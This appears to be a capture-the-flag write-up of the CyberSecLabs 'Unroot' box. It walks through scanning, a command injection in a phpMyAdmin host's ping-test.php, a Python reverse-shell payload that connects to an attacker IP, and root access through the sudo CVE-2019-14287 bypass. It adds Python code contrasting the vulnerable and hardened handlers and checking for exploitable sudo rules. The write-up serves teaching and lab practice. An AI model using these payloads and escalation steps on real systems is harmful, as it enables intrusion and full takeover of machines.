Hack World

Unroot (CyberSecLabs writeup)

Last updated 3 years ago
nmap

mkdir nmap
sudo rustscan -a 172.31.1.17 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

Only a web server is listening, on port 80.

Web enumeration

Opening it in the browser shows that it is hosting phpMyAdmin.

I tried logging in with the most common phpMyAdmin username and password combinations, but none of them worked, so I moved on to directory busting instead.

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://172.31.1.17/FUZZ -ignore-body -recursion -recursion-depth 2 -t 40 -ic -c -o webdir.domain.root -e .php,.html,.txt

Note on the flags: ffuf appends each -e extension verbatim, so they need the leading dot, and -D (DirSearch compatibility mode) only substitutes a %EXT% keyword inside the wordlist; with directory-list-2.3-medium, which has no %EXT%, -D would stop the extensions from being tried at all, so it is left out here.

After a few seconds it finds a /dev directory.

There's an interesting file, called ping-test.php.

After some experimentation it turned out that the input parameter is passed straight to a shell (OS command injection), which gives Remote Code Execution as the web server user: anything placed after a semicolon (;) is executed as a separate shell command. A quick check is to submit 127.0.0.1; id and look for the uid line in the response.
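To make the bug concrete, here is an added example (not code from the page or from the box): a Python model of the ping-test.php handler. The page does not show its source, so the vulnerable function assumes the usual pattern of user input concatenated into a shell string (PHP's shell_exec("ping -c 1 " . $input)); the hardened version validates the target and calls the program without a shell. In the demo, echo stands in for ping so it runs offline.

```python
"""Model of the ping-test.php command injection: vulnerable pattern next to a hardened one."""
import ipaddress
import re
import subprocess

# Strict RFC 1123 hostname syntax. A label cannot start with '-', so a validated
# target can never be mistaken for a command-line option of the called program.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def run_ping_vulnerable(host, base_cmd="ping -c 1"):
    """Vulnerable pattern (assumed equivalent of the PHP handler on the box):
    the user-controlled string is glued into one shell command line, so ';', '|',
    '&&', backticks and $(...) all run arbitrary commands as the web server user."""
    cmd = f"{base_cmd} {host}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def validate_target(host):
    """Accept only an IP literal or a syntactically valid hostname; reject anything else."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"refusing to ping {host!r}: not an IP address or hostname")


def run_ping_hardened(host, base_argv=("ping", "-c", "1")):
    """Hardened pattern: validate first, then pass an argv list with no shell at all,
    so shell metacharacters in `host` are never interpreted by anything."""
    target = validate_target(host)
    proc = subprocess.run([*base_argv, target], capture_output=True, text=True)
    return proc.stdout


def rejects(host):
    """True if the hardened validator refuses this input."""
    try:
        validate_target(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # 'echo PING' stands in for 'ping -c 1' so the demo needs neither network nor a ping binary.
    payload = "127.0.0.1; id"
    print("vulnerable handler output:\n" + run_ping_vulnerable(payload, base_cmd="echo PING"))
    print("hardened validator rejects payload:", rejects(payload))
    print("hardened handler output:", run_ping_hardened("127.0.0.1", base_argv=("echo", "PING")))
```

The vulnerable function prints the echoed ping line followed by the output of id, exactly the behaviour abused on the box; the hardened one never reaches the shell, and even a validated name cannot smuggle an option because the regex forbids a leading dash.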

Exploitation

First, craft a reverse shell payload with python (10.0.0.1 is the attacking machine's IP here; replace it with your own):

; python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Set a netcat listener

sudo nc -lvnp 80  

Paste the payload into the input field and click run; the listener should catch the initial shell right away.

Sweet, we now have a shell as the user joe.

Privilege Escalation

Running sudo --version shows sudo 1.8.16, which is vulnerable to CVE-2019-14287 (fixed in 1.8.28). The bug is only useful when sudo -l lists a rule that lets the user run a command as any user except root, e.g. (ALL, !root) /bin/bash: sudo parses -u#-1 as uid -1, which matches neither root nor #0 in the exclusion, but the later setresuid(-1, ...) call leaves the effective uid at 0 (sudo is already root), so the command runs as root. -u#4294967295 works the same way.

To gain root, just execute sudo -u#-1 bash
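As an added example (not part of the original writeup), the following Python checks both preconditions from the output of sudo --version and sudo -l, rather than relying on the version number alone. The version output mirrors the 1.8.16 seen on the box; the sudo -l output is constructed, since the page does not show it, and assumes the (ALL, !root) rule that sudo -u#-1 bash working implies.

```python
"""Check exposure to CVE-2019-14287 from `sudo --version` and `sudo -l` output."""
import re

FIXED_VERSION = (1, 8, 28)  # the -u#-1 bypass was fixed in sudo 1.8.28

# A Runas line from `sudo -l`, e.g. "    (ALL, !root) /bin/bash" or "    (ALL : ALL) ALL"
RUNAS_LINE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(.+?)\s*$")
# Tags that may precede the command in a sudoers entry (NOPASSWD:, SETENV:, NOEXEC:, ...)
TAG_PREFIX_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")

# Constructed sample output, modelled on the box: sudo 1.8.16, user joe with a (ALL, !root) rule.
SAMPLE_VERSION_OUTPUT = """\
Sudo version 1.8.16
Sudoers policy plugin version 1.8.16
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.16
"""

SAMPLE_SUDO_L_OUTPUT = """\
Matching Defaults entries for joe on unroot:
    env_reset, mail_badpass

User joe may run the following commands on unroot:
    (ALL, !root) /bin/bash
"""


def parse_sudo_version(output):
    """Return (major, minor, patch) from the 'Sudo version X.Y.Z' line; a 'p1' suffix is ignored."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", output)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(x) for x in m.groups())


def exploitable_rules(sudo_l_output):
    """Commands whose Runas user list is ALL with root excluded, e.g. '(ALL, !root)'.

    Only those rules matter for CVE-2019-14287: '-u#-1' is read as uid -1, which matches
    neither 'root' nor '#0' in the exclusion, yet sudo's setresuid(-1, ...) leaves the
    effective uid at 0 because sudo is already running as root."""
    found = []
    for line in sudo_l_output.splitlines():
        m = RUNAS_LINE_RE.match(line)
        if not m:
            continue
        runas_spec, command = m.groups()
        user_part = runas_spec.split(":")[0]  # drop the optional group list after ':'
        users = {u.strip() for u in user_part.split(",")}
        if "ALL" in users and ({"!root", "!#0"} & users):
            found.append(command)
    return found


def check_cve_2019_14287(version_output, sudo_l_output):
    """Return (vulnerable, matching rules, ready-to-run escalation commands)."""
    version = parse_sudo_version(version_output)
    rules = exploitable_rules(sudo_l_output)
    vulnerable = version < FIXED_VERSION and bool(rules)
    commands = []
    if vulnerable:
        for rule in rules:
            cmd = TAG_PREFIX_RE.sub("", rule)  # strip NOPASSWD: and friends, keep the command
            commands.append(f"sudo -u#-1 {cmd}")
    return vulnerable, rules, commands


if __name__ == "__main__":
    vulnerable, rules, commands = check_cve_2019_14287(SAMPLE_VERSION_OUTPUT, SAMPLE_SUDO_L_OUTPUT)
    print("vulnerable:", vulnerable)
    print("matching rules:", rules)
    print("escalation commands:", commands)
```

A rule such as (ALL : ALL) ALL is deliberately not reported: with no root exclusion there is nothing to bypass, and plain sudo -u root would already work.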

Thanks for reading, and enjoy your day! :D